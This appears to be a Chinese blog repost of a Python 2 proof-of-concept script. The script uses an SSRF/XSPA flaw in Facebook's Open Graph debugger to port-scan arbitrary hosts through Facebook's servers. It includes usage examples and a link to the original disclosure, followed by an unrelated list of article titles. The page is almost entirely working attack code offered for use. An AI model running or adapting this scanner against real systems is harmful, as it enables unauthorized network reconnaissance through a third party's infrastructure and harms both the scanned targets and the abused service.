XSPA / SSRF 利用脚本
2015-08-23 15:37
519 查看
#Author: Riyaz Ahemed Walikar import sys import requests import time useragent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'} def portscan(port): payload = {'q': 'http%3A%2F%2F' + str(ip) + '%3A' + str(port) + '%2Findex.html'} r = requests.get ('http://developers.facebook.com/tools/debug/og/object', allow_redirects=False, params=payload, headers=useragent) if r.status_code == 200: data = r.text status = 'unknown' if data.find('>503</td>') > 1: #check if response contains 503 which means port closed anything else means its open status = 'Closed' else: status = 'Open' print str(port) + ":" + status helpmsg = 'PoC for FB URL Port Scanning\nCreated by Riyaz Ahemed Walikar\n\nUsage: \ fbportscan.py <public_ip> <portrange|all|csv_ports>\n\nExample: xspafbportscanner.py scanme.nmap.org 20-3890\nExample: \ fbportscan.py scanme.nmap.org all\nExample: xspafbportscanner.py scanme.nmap.org 22,23,80,445,3389\n\nProvide valid external/internal public hostnames/ip.' if len(sys.argv) < 3: print "Not enough parameters.\n" print helpmsg sys.exit() ip = sys.argv[1] portnum = sys.argv[2] print 'Starting portscan on ' + ip + ' using the Facebook URL: http://developers.facebook.com/tools/debug/og/object?q=\n' if portnum.find("-") > 1: startport = int(portnum.split("-")[0]) endport = int(portnum.split("-")[1]) for port in range(startport,endport+1): portscan(port) sys.exit() if str.upper(portnum) == "ALL": for port in range(1,65536): portscan(port) sys.exit() if portnum.find(",") > 1: ports = portnum.split(",") for port in ports: portscan(port) sys.exit() if portnum.isdigit() == 1: if int(portnum) > 0 and int(portnum) < 65536: port = int(portnum) portscan(port) sys.exit() print "Invalid parameters.\n" print helpmsg sys.exit()
来自:http://www.riyazwalikar.com/2013/05/xspa-ssrf-bug-with-facebooks-developer.html
相关文章推荐
- SpringMVC文件下载与上传
- 打开smb的几个步骤(非开机启动)
- 生成u-boot.bin 的错误
- 快速幂求模
- actionbar教程集锦
- 黑马程序员--Java基础学习(GUI图形化界面)第二十二天
- ZipArchive压缩文件,文件夹以及解压文件和文件夹
- Dom第五天学习总结
- Detours -- Hook API (MessageBoxW)
- Linux 命令
- 洛谷1049 装箱问题 解题报告
- JDBC基础编程总结
- 今天的我好心痛,调了好久的代码却一直没调好,就因为。。。。。。。。。。
- 在已损坏了程序内部状态的 string.exe 中发生了缓冲区溢出。按“中断”以调试程序,或按“继续”以终止程序。
- strin中strstr(str1,str2)函数 指向字符串str2 首次出现于字符串str1中的位置
- 2042 不容易系列之二【递推】
- A class file was not written.
- 安装RPM包时的相互依赖
- php get_class_vars函数
- A1049. Counting Ones (30)